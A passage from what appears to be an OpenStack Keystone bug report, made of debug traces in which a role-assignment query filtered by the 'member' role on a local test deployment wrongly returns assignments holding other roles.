"member" (it's the other way around). $ openstack role assignment list --names --system all --debug START with options: role assignment list --names --system all --debug options: Namespace(access_key='', access_secret='***', access_token='***', access_token_endpoint='', access_token_type='', application_credential_id='', application_credential_name='', application_credential_secret='***', auth_methods='', auth_type='', auth_url='', cacert=None, cert='', client_id='', client_secret='***', cloud='devstack-system-admin', code='', consumer_key='', consumer_secret='***', debug=True, default_domain='default', default_domain_id='', default_domain_name='', deferred_help=False, discovery_endpoint='', domain_id='', domain_name='', endpoint='', identity_provider='', identity_provider_url='', insecure=None, interface='public', key='', log_file=None, openid_scope='', os_beta_command=False, os_compute_api_version='', os_identity_api_version='', os_image_api_version='', os_key_manager_api_version='1', os_network_api_version='', os_object_api_version='', os_project_id=None, os_project_name=None, os_volume_api_version='', passcode='', password='***', profile='', project_domain_id='', project_domain_name='', project_id='', project_name='', protocol='', redirect_uri='', region_name='', remote_project_domain_id='', remote_project_domain_name='', remote_project_id='', remote_project_name='', service_provider='', service_provider_endpoint='', service_provider_entity_id='', system_scope='', timing=False, token='***', trust_id='', url='', user_domain_id='', user_domain_name='', user_id='', username='', verbose_level=3, verify=None) Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-admin', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interface': 'public', u'disable_vendor_agent': {}} defaults: {u'auth_type': 'password', u'status': u'active', u'image_status_code_retries': 5, u'baremetal_introspection_status_code_retries': 5, 'api_timeout': None, 'cacert': None, u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key': None, u'interface': u'public', u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', u'baremetal_status_code_retries': 5, 'verify': True, 'cert': None, u'secgroup_source': u'neutron', u'object_store_api_version': u'1', u'disable_vendor_agent': {}} cloud cfg: {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-admin', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interface': 'public', u'disable_vendor_agent': {}} compute API version 2.1, cmd group openstack.compute.v2 network API version 2, cmd group openstack.network.v2 image API version 2, cmd group openstack.image.v2 volume API version 3, cmd group openstack.volume.v3 identity API version 3, cmd group openstack.identity.v3 object_store API version 1, cmd group openstack.object_store.v1 key_manager API version 1, cmd group openstack.key_manager.v1 Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-admin', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interface': 'public', u'disable_vendor_agent': {}} Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-admin', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interface': 'public', u'disable_vendor_agent': {}} command: role assignment list -> openstackclient.identity.v3.role_assignment.ListRoleAssignment (auth=True) Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'timing': False, 'additional_user_agent': [('osc-lib', '1.13.0')], u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-admin', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key': None, u'interface': 'public', 'cacert': None, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'disable_vendor_agent': {}} Using auth plugin: password Using parameters {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'} Get auth_ref REQ: curl -g -i -X GET http://10.0.3.122/identity -H "Accept: application/json" -H "User-Agent: openstacksdk/0.34.0 keystoneauth1/3.17.0 python-requests/2.22.0 CPython/2.7.15+" Starting new HTTP connection (1): 10.0.3.122:80 http://10.0.3.122:80 "GET /identity HTTP/1.1" 300 269 RESP: [300] Connection: close Content-Length: 269 Content-Type: application/json Date: Fri, 04 Oct 2019 18:56:29 GMT Location: http://10.0.3.122/identity/v3/ Server: Apache/2.4.29 (Ubuntu) Vary: X-Auth-Token x-openstack-request-id: req-f35dcb91-9d9f-4c85-9421-1600e6a6ec27 RESP BODY: {"versions": {"values": [{"status": "stable", "updated": "2019-07-19T00:00:00Z", "media-types": [{"base": "application/json", "type": "application/vnd.openstack.identity-v3+json"}], "id": "v3.13", "links": [{"href": "http://10.0.3.122/identity/v3/", "rel": "self"}]}]}} GET call to http://10.0.3.122/identity used request id req-f35dcb91-9d9f-4c85-9421-1600e6a6ec27 Making authentication request to http://10.0.3.122/identity/v3/auth/tokens Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "POST /identity/v3/auth/tokens HTTP/1.1" 201 1194 {"token": {"methods": ["password"], "roles": [{"id": "7a11d0ba747046d7936fbb8f97dc5cb1", "name": "admin"}, {"id": "a8cd98f2e98d4135b2fa83950d6171ec", "name": "member"}, {"id": "7ee093f4ccf345bba963ce765f9b797f", "name": "reader"}], "system": {"all": true}, "expires_at": "2019-10-04T19:56:29.000000Z", "catalog": [{"endpoints": [{"url": "http://10.0.3.122/image", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "279159944f0843179bb376b4a7ac5c45"}], "type": "image", "id": "24305f1e70ec474d895e409f4b339f18", "name": "glance"}, {"endpoints": [{"url": "http://10.0.3.122/identity", "interface": "admin", "region": "RegionOne", "region_id": "RegionOne", "id": "5ba5cca8ad654f5ea9d633321893d620"}, {"url": "http://10.0.3.122/identity", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "f3b136a56d1a4839bd1bc50a070f8f86"}], "type": "identity", "id": "da3d368b566b4a9686ddadbb64004c26", "name": "keystone"}], "user": {"domain": {"id": "default", "name": "Default"}, "password_expires_at": null, "name": "admin", "id": "0ec0eb48c66d4fb79c432a2ff8c5d257"}, "audit_ids": ["JVQCRxBoTUyzm2CqiCoj6w"], "issued_at": "2019-10-04T18:56:29.000000Z"}} run(Namespace(authproject=False, authuser=False, columns=[], domain=None, effective=False, fit_width=False, formatter='table', group=None, group_domain=None, inherited=False, max_width=0, names=True, noindent=False, print_empty=False, project=None, project_domain=None, quote_mode='nonnumeric', role=None, role_domain=None, sort_columns=[], system=u'all', user=None, user_domain=None)) Instantiating identity client: Making authentication request to http://10.0.3.122/identity/v3/auth/tokens Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "POST /identity/v3/auth/tokens HTTP/1.1" 201 1194 {"token": {"methods": ["password"], "roles": [{"id": "7a11d0ba747046d7936fbb8f97dc5cb1", "name": "admin"}, {"id": "a8cd98f2e98d4135b2fa83950d6171ec", "name": "member"}, {"id": "7ee093f4ccf345bba963ce765f9b797f", "name": "reader"}], "system": {"all": true}, "expires_at": "2019-10-04T19:56:29.000000Z", "catalog": [{"endpoints": [{"url": "http://10.0.3.122/image", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "279159944f0843179bb376b4a7ac5c45"}], "type": "image", "id": "24305f1e70ec474d895e409f4b339f18", "name": "glance"}, {"endpoints": [{"url": "http://10.0.3.122/identity", "interface": "admin", "region": "RegionOne", "region_id": "RegionOne", "id": "5ba5cca8ad654f5ea9d633321893d620"}, {"url": "http://10.0.3.122/identity", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "f3b136a56d1a4839bd1bc50a070f8f86"}], "type": "identity", "id": "da3d368b566b4a9686ddadbb64004c26", "name": "keystone"}], "user": {"domain": {"id": "default", "name": "Default"}, "password_expires_at": null, "name": "admin", "id": "0ec0eb48c66d4fb79c432a2ff8c5d257"}, "audit_ids": ["U9Z3md9YTP-9-bTLuPDIzg"], "issued_at": "2019-10-04T18:56:29.000000Z"}} REQ: curl -g -i -X GET http://10.0.3.122/identity/v3/role_assignments?scope.system=all&include_names=True -H "Accept: application/json" -H "User-Agent: python-keystoneclient" -H "X-Auth-Token: {SHA256}042443671367aa0183e15fd2692bf4c70d15050bdac46db883fd836440ae1065" Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "GET /identity/v3/role_assignments?scope.system=all&include_names=True HTTP/1.1" 200 2401 RESP: [200] Connection: close Content-Length: 2401 Content-Type: application/json Date: Fri, 04 Oct 2019 18:56:29 GMT Server: Apache/2.4.29 (Ubuntu) Vary: X-Auth-Token x-openstack-request-id: req-c9bf133b-7ec4-49a5-b9da-3185dc6c55d2 RESP BODY: {"role_assignments": [{"scope": {"system": {"all": true}}, "role": {"id": "7a11d0ba747046d7936fbb8f97dc5cb1", "name": "admin"}, "group": {"domain": {"id": "default", "name": "Default"}, "id": "c814cd4739bd4960ad08ade3814f1560", "name": "system-admins"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/groups/c814cd4739bd4960ad08ade3814f1560/roles/7a11d0ba747046d7936fbb8f97dc5cb1"}}, {"scope": {"system": {"all": true}}, "role": {"id": "7ee093f4ccf345bba963ce765f9b797f", "name": "reader"}, "group": {"domain": {"id": "default", "name": "Default"}, "id": "dd97034049fd46a6bdb33a32f1c7759e", "name": "system-auditors"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/groups/dd97034049fd46a6bdb33a32f1c7759e/roles/7ee093f4ccf345bba963ce765f9b797f"}}, {"scope": {"system": {"all": true}}, "role": {"id": "7a11d0ba747046d7936fbb8f97dc5cb1", "name": "admin"}, "user": {"domain": {"id": "default", "name": "Default"}, "id": "0ec0eb48c66d4fb79c432a2ff8c5d257", "name": "admin"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/users/0ec0eb48c66d4fb79c432a2ff8c5d257/roles/7a11d0ba747046d7936fbb8f97dc5cb1"}}, {"scope": {"system": {"all": true}}, "role": {"id": "7a11d0ba747046d7936fbb8f97dc5cb1", "name": "admin"}, "user": {"domain": {"id": "default", "name": "Default"}, "id": "0f75914e63cb46e795cae7e6facd0ecb", "name": "operator"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/users/0f75914e63cb46e795cae7e6facd0ecb/roles/7a11d0ba747046d7936fbb8f97dc5cb1"}}, {"scope": {"system": {"all": true}}, "role": {"id": "a8cd98f2e98d4135b2fa83950d6171ec", "name": "member"}, "user": {"domain": {"id": "default", "name": "Default"}, "id": "66256692b6b942a8814ffd87d32a3963", "name": "system-support"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/users/66256692b6b942a8814ffd87d32a3963/roles/a8cd98f2e98d4135b2fa83950d6171ec"}}, {"scope": {"system": {"all": true}}, "role": {"id": "7ee093f4ccf345bba963ce765f9b797f", "name": "reader"}, "user": {"domain": {"id": "default", "name": "Default"}, "id": "e8fec49e15984aedb5e1235f279434fe", "name": "auditor"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/users/e8fec49e15984aedb5e1235f279434fe/roles/7ee093f4ccf345bba963ce765f9b797f"}}], "links": {"self": "http://10.0.3.122/identity/v3/role_assignments?scope.system=all&include_names=True", "previous": null, "next": null}} GET call to identity for http://10.0.3.122/identity/v3/role_assignments?scope.system=all&include_names=True used request id req-c9bf133b-7ec4-49a5-b9da-3185dc6c55d2 +--------+------------------------+-------------------------+---------+--------+--------+-----------+ | Role | User | Group | Project | Domain | System | Inherited | +--------+------------------------+-------------------------+---------+--------+--------+-----------+ | admin | | system-admins at Default | | | all | False | | reader | | system-auditors at Default | | | all | False | | admin | admin at Default | | | | all | False | | admin | operator at Default | | | | all | False | | member | system-support at Default | | | | all | False | | reader | auditor at Default | | | | all | False | +--------+------------------------+-------------------------+---------+--------+--------+-----------+ clean_up ListRoleAssignment: END return value: 0 The Trace above lists all system role assignments to confirm my setup locally. The following trace shows that the group is returned with the wrong role assignment based on the filter. $ openstack role assignment list --names --system all --role member --debug [1/880] START with options: role assignment list --names --system all --role member --debug options: Namespace(access_key='', access_secret='***', access_token='***', access_token_endpoint='', access_token_type='', application_credential_id='', application_credential_name='', application_credential_secret='***', auth_methods='',  auth_type='', auth_url='', cacert=None, cert='', client_id='', client_secret='***', cloud='devstack-system-admin', code='', consumer_key='', consumer_secret='***', debug=True, default_domain='default', default_domain_id='', default_domai n_name='', deferred_help=False, discovery_endpoint='', domain_id='', domain_name='', endpoint='', identity_provider='', identity_provider_url='', insecure=None, interface='public', key='', log_file=None, openid_scope='', os_beta_command=F alse, os_compute_api_version='', os_identity_api_version='', os_image_api_version='', os_key_manager_api_version='1', os_network_api_version='', os_object_api_version='', os_project_id=None, os_project_name=None, os_volume_api_version='',  passcode='', password='***', profile='', project_domain_id='', project_domain_name='', project_id='', project_name='', protocol='', redirect_uri='', region_name='', remote_project_domain_id='', remote_project_domain_name='', remote_proje ct_id='', remote_project_name='', service_provider='', service_provider_endpoint='', service_provider_entity_id='', system_scope='', timing=False, token='***', trust_id='', url='', user_domain_id='', user_domain_name='', user_id='', usern ame='', verbose_level=3, verify=None) Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-ad min', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system _scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key ': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interface': 'public', u'disable_vendor_agent': {}} defaults: {u'auth_type': 'password', u'status': u'active', u'image_status_code_retries': 5, u'baremetal_introspection_status_code_retries': 5, 'api_timeout': None, 'cacert': None, u'image_api_use_tasks': False, u'floating_ip_source': u'ne utron', 'key': None, u'interface': u'public', u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', u'baremetal_status_code_retries': 5, 'verify': True, 'cert': None, u'secgroup_source': u'neutron', u'object_store_api_ version': u'1', u'disable_vendor_agent': {}} cloud cfg: {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-admin', 've rify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interfa ce': 'public', u'disable_vendor_agent': {}} compute API version 2.1, cmd group openstack.compute.v2 network API version 2, cmd group openstack.network.v2 image API version 2, cmd group openstack.image.v2 volume API version 3, cmd group openstack.volume.v3 identity API version 3, cmd group openstack.identity.v3 object_store API version 1, cmd group openstack.object_store.v1 key_manager API version 1, cmd group openstack.key_manager.v1 Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-ad min', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system _scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key ': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interface': 'public', u'disable_vendor_agent': {}} Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-ad min', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system _scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key ': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interface': 'public', u'disable_vendor_agent': {}} command: role assignment list -> openstackclient.identity.v3.role_assignment.ListRoleAssignment (auth=True) Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'timing': False, 'additional_user_agent': [('osc-lib', '1.13.0')], u'network_api_version': u'2', u'message': u'', u'image_format': u'q cow2', 'networks': [], 'cloud': 'devstack-system-admin', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_ti meout': None, 'auth': {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tas ks': False, u'floating_ip_source': u'neutron', 'key': None, u'interface': 'public', 'cacert': None, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_h elp': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'disable_vendor_agent': {}} Using auth plugin: password Using parameters {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'} Get auth_ref REQ: curl -g -i -X GET http://10.0.3.122/identity -H "Accept: application/json" -H "User-Agent: openstacksdk/0.34.0 keystoneauth1/3.17.0 python-requests/2.22.0 CPython/2.7.15+" Starting new HTTP connection (1): 10.0.3.122:80 http://10.0.3.122:80 "GET /identity HTTP/1.1" 300 269 RESP: [300] Connection: close Content-Length: 269 Content-Type: application/json Date: Fri, 04 Oct 2019 18:56:49 GMT Location: http://10.0.3.122/identity/v3/ Server: Apache/2.4.29 (Ubuntu) Vary: X-Auth-Token x-openstack-request-id: req-d5 784d4c-7b47-4647-b912-65e6a78b835e RESP BODY: {"versions": {"values": [{"status": "stable", "updated": "2019-07-19T00:00:00Z", "media-types": [{"base": "application/json", "type": "application/vnd.openstack.identity-v3+json"}], "id": "v3.13", "links": [{"href": "http://10. 0.3.122/identity/v3/", "rel": "self"}]}]}} GET call to http://10.0.3.122/identity used request id req-d5784d4c-7b47-4647-b912-65e6a78b835e Making authentication request to http://10.0.3.122/identity/v3/auth/tokens Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "POST /identity/v3/auth/tokens HTTP/1.1" 201 1194 {"token": {"methods": ["password"], "roles": [{"id": "7a11d0ba747046d7936fbb8f97dc5cb1", "name": "admin"}, {"id": "a8cd98f2e98d4135b2fa83950d6171ec", "name": "member"}, {"id": "7ee093f4ccf345bba963ce765f9b797f", "name": "reader"}], "syste m": {"all": true}, "expires_at": "2019-10-04T19:56:49.000000Z", "catalog": [{"endpoints": [{"url": "http://10.0.3.122/image", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "279159944f0843179bb376b4a7ac5c45" }], "type": "image", "id": "24305f1e70ec474d895e409f4b339f18", "name": "glance"}, {"endpoints": [{"url": "http://10.0.3.122/identity", "interface": "admin", "region": "RegionOne", "region_id": "RegionOne", "id": "5ba5cca8ad654f5ea9d633321 893d620"}, {"url": "http://10.0.3.122/identity", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "f3b136a56d1a4839bd1bc50a070f8f86"}], "type": "identity", "id": "da3d368b566b4a9686ddadbb64004c26", "name": "ke ystone"}], "user": {"domain": {"id": "default", "name": "Default"}, "password_expires_at": null, "name": "admin", "id": "0ec0eb48c66d4fb79c432a2ff8c5d257"}, "audit_ids": ["SGRaWT8BTVuzELGwxqjBdg"], "issued_at": "2019-10-04T18:56:49.000000 Z"}} run(Namespace(authproject=False, authuser=False, columns=[], domain=None, effective=False, fit_width=False, formatter='table', group=None, group_domain=None, inherited=False, max_width=0, names=True, noindent=False, print_empty=False, pro ject=None, project_domain=None, quote_mode='nonnumeric', role=u'member', role_domain=None, sort_columns=[], system=u'all', user=None, user_domain=None)) Instantiating identity client: Making authentication request to http://10.0.3.122/identity/v3/auth/tokens Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "POST /identity/v3/auth/tokens HTTP/1.1" 201 1194 {"token": {"methods": ["password"], "roles": [{"id": "7a11d0ba747046d7936fbb8f97dc5cb1", "name": "admin"}, {"id": "a8cd98f2e98d4135b2fa83950d6171ec", "name": "member"}, {"id": "7ee093f4ccf345bba963ce765f9b797f", "name": "reader"}], "syste m": {"all": true}, "expires_at": "2019-10-04T19:56:50.000000Z", "catalog": [{"endpoints": [{"url": "http://10.0.3.122/image", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "279159944f0843179bb376b4a7ac5c45" }], "type": "image", "id": "24305f1e70ec474d895e409f4b339f18", "name": "glance"}, {"endpoints": [{"url": "http://10.0.3.122/identity", "interface": "admin", "region": "RegionOne", "region_id": "RegionOne", "id": "5ba5cca8ad654f5ea9d633321 893d620"}, {"url": "http://10.0.3.122/identity", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "f3b136a56d1a4839bd1bc50a070f8f86"}], "type": "identity", "id": "da3d368b566b4a9686ddadbb64004c26", "name": "ke ystone"}], "user": {"domain": {"id": "default", "name": "Default"}, "password_expires_at": null, "name": "admin", "id": "0ec0eb48c66d4fb79c432a2ff8c5d257"}, "audit_ids": ["2nu0u-1wQRmWA9_uS2hZ-g"], "issued_at": "2019-10-04T18:56:50.000000 Z"}} REQ: curl -g -i -X GET http://10.0.3.122/identity/v3/roles/member -H "Accept: application/json" -H "User-Agent: python-keystoneclient" -H "X-Auth-Token: {SHA256}cb5bcba8735c5a7ea6f80ea414ee306e1a0b6a9c0c39c4dbf1296a96f6516ab6" Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "GET /identity/v3/roles/member HTTP/1.1" 404 84 RESP: [404] Connection: close Content-Length: 84 Content-Type: application/json Date: Fri, 04 Oct 2019 18:56:50 GMT Server: Apache/2.4.29 (Ubuntu) Vary: X-Auth-Token x-openstack-request-id: req-88bce424-60f2-4d2a-a6f5-2bd256602789 RESP BODY: {"error":{"code":404,"message":"Could not find role: member.","title":"Not Found"}} GET call to identity for http://10.0.3.122/identity/v3/roles/member used request id req-88bce424-60f2-4d2a-a6f5-2bd256602789 Request returned failure status: 404 REQ: curl -g -i -X GET http://10.0.3.122/identity/v3/roles?name=member -H "Accept: application/json" -H "User-Agent: python-keystoneclient" -H "X-Auth-Token: {SHA256}cb5bcba8735c5a7ea6f80ea414ee306e1a0b6a9c0c39c4dbf1296a96f6516ab6" Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "GET /identity/v3/roles?name=member HTTP/1.1" 200 322 RESP: [200] Connection: close Content-Length: 322 Content-Type: application/json Date: Fri, 04 Oct 2019 18:56:50 GMT Server: Apache/2.4.29 (Ubuntu) Vary: X-Auth-Token x-openstack-request-id: req-ce429b68-b53d-4c49-9080-ed3da3bce55b RESP BODY: {"links": {"self": "http://10.0.3.122/identity/v3/roles?name=member", "previous": null, "next": null}, "roles": [{"description": null, "links": {"self": "http://10.0.3.122/identity/v3/roles/a8cd98f2e98d4135b2fa83950d6171ec"}, " options": {}, "id": "a8cd98f2e98d4135b2fa83950d6171ec", "domain_id": null, "name": "member"}]} GET call to identity for http://10.0.3.122/identity/v3/roles?name=member used request id req-ce429b68-b53d-4c49-9080-ed3da3bce55b REQ: curl -g -i -X GET http://10.0.3.122/identity/v3/role_assignments?scope.system=all&role.id=a8cd98f2e98d4135b2fa83950d6171ec&include_names=True -H "Accept: application/json" -H "User-Agent: python-keystoneclient" -H "X-Auth-Token: {SHA 256}cb5bcba8735c5a7ea6f80ea414ee306e1a0b6a9c0c39c4dbf1296a96f6516ab6" Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "GET /identity/v3/role_assignments?scope.system=all&role.id=a8cd98f2e98d4135b2fa83950d6171ec&include_names=True HTTP/1.1" 200 1328 RESP: [200] Connection: close Content-Length: 1328 Content-Type: application/json Date: Fri, 04 Oct 2019 18:56:50 GMT Server: Apache/2.4.29 (Ubuntu) Vary: X-Auth-Token x-openstack-request-id: req-08f9bdb9-149d-4905-96cc-99b87c8b6339 RESP BODY: {"role_assignments": [{"scope": {"system": {"all": true}}, "role": {"id": "7ee093f4ccf345bba963ce765f9b797f", "name": "reader"}, "group": {"domain": {"id": "default", "name": "Default"}, "id": "dd97034049fd46a6bdb33a32f1c7759e" , "name": "system-auditors"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/groups/dd97034049fd46a6bdb33a32f1c7759e/roles/7ee093f4ccf345bba963ce765f9b797f"}}, {"scope": {"system": {"all": true}}, "role": {"id": "7a11d0ba74 7046d7936fbb8f97dc5cb1", "name": "admin"}, "user": {"domain": {"id": "default", "name": "Default"}, "id": "0f75914e63cb46e795cae7e6facd0ecb", "name": "operator"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/users/0f75914 e63cb46e795cae7e6facd0ecb/roles/7a11d0ba747046d7936fbb8f97dc5cb1"}}, {"scope": {"system": {"all": true}}, "role": {"id": "a8cd98f2e98d4135b2fa83950d6171ec", "name": "member"}, "user": {"domain": {"id": "default", "name": "Default"}, "id":  "66256692b6b942a8814ffd87d32a3963", "name": "system-support"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/users/66256692b6b942a8814ffd87d32a3963/roles/a8cd98f2e98d4135b2fa83950d6171ec"}}], "links": {"self": "http://10. 